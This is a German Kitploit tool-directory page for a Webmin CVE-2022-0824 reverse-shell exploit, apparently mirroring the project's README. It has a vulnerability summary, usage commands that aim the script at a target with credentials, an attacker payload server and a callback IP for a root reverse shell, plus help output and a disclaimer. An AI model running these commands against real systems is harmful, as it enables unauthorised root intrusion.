Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/faisalfs10x/webmin-cve-2022-0824-revshell
Privilege EscalationPayload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubfaisalfs10x/webmin-cve-2022-0824-revshell

Webmin-CVE-2022-0824-revshell

Post-Authentifizierungs-Reverse-Shell-Exploit für Webmin <=1.984, der die File-Manager-Privilege-Escalation von CVE-2022-0824 ausnutzt. Lädt eine CGI-Payload herunter und führt sie aus, um Root-Zugriff zu erlangen.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
111332vor 4 JahrenVon Kitploit geprüft

Webmin-CVE-2022-0824-revshell

Schwachstellenbeschreibung

Webmin 1.984 und darunter - Dateimanager Privilegienausnutzung (CVE-2022-0824 und CVE-2022-0829)
Weniger privilegierte Webmin-Benutzer, die keine Einschränkungen für das Dateimanager-Modul konfiguriert haben, können mit Root-Rechten auf Dateien zugreifen, wenn sie das standardmäßige Authentic-Theme verwenden. Alle Systeme mit zusätzlichen nicht vertrauenswürdigen Webmin-Benutzern sollten sofort aktualisiert werden. Beachten Sie, dass Virtualmin-Systeme aufgrund der Art und Weise, wie Webmin-Benutzer mit Domain-Besitzer konfiguriert werden, von diesem Fehler nicht betroffen sind.
Quelle: https://www.webmin.com/security.html

Exploit-Beschreibung

Dieser Exploit nutzt die Schwachstelle der unsachgemäßen Zugriffskontrolle nach der Authentifizierung im Dateimanager aus. Dieser Exploit könnte von jedem weniger privilegierten authentifizierten Angreifer durchgeführt werden. Er lädt eine .cgi-Datei von einem vom Angreifer kontrollierten Server herunter und ändert deren Berechtigungen, sodass sie eine weltweit ausführbare Datei wird. Sobald dies erledigt ist, führt er die .cgi-Datei aus, um eine Reverse-Verbindung zum vom Angreifer kontrollierten Server mit Root-Rechten herzustellen.

Referenz: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/

Verwendung

root@kitploit:~
$~ python3 Webmin-revshell.py -t [TARGET] -c [CREDENTIAL] -LS [PY3HTTP_SERVER] -L [CALLBACK_IP] -P [CALLBACK_PORT]
$~ python3 Webmin-revshell.py -t https://192.168.5.118:10000 -c user:user123 -LS 192.168.5.120:9090 -L 192.168.5.120 -P 4444

$~  python3 Webmin-revshell.py -h                                                                                                                                    
    usage: Webmin-revshell.py [-h] -t TARGET -c CREDENTIAL -LS PY3HTTP_SERVER -L CALLBACK_IP -P CALLBACK_PORT [-V]

    Webmin CVE-2022-0824 Reverse Shell

    optional arguments:
      -h, --help            show this help message and exit
      -t TARGET, --target TARGET
                            Target full URL, https://www.webmin.local:10000
      -c CREDENTIAL, --credential CREDENTIAL
                            Format, user:user123
      -LS PY3HTTP_SERVER, --py3http_server PY3HTTP_SERVER
                            Http server for serving payload, ex 192.168.5.120:8080
      -L CALLBACK_IP, --callback_ip CALLBACK_IP
                            Callback IP to receive revshell
      -P CALLBACK_PORT, --callback_port CALLBACK_PORT
                            Callback port to receive revshell
      -V, --version         show program's version number and exit

PoC

root@kitploit:~
Ziel-Host: https://192.168.5.118:10000
Angreifer-Host: 192.168.5.120

https://user-images.githubusercontent.com/51811615/156904265-80c2ee4f-8447-41cd-9197-446bf6555e25.mp4

Getestet auf

root@kitploit:~
- Webmin 1.984
- Ubuntu 18.04
- Kali 2021.3

Haftungsausschluss:

root@kitploit:~
Das Skript dient ausschließlich der Sicherheitsanalyse und Forschung, daher übernehme ich keine Haftung, wenn es für illegale Aktivitäten verwendet wird.
Tool herunterladen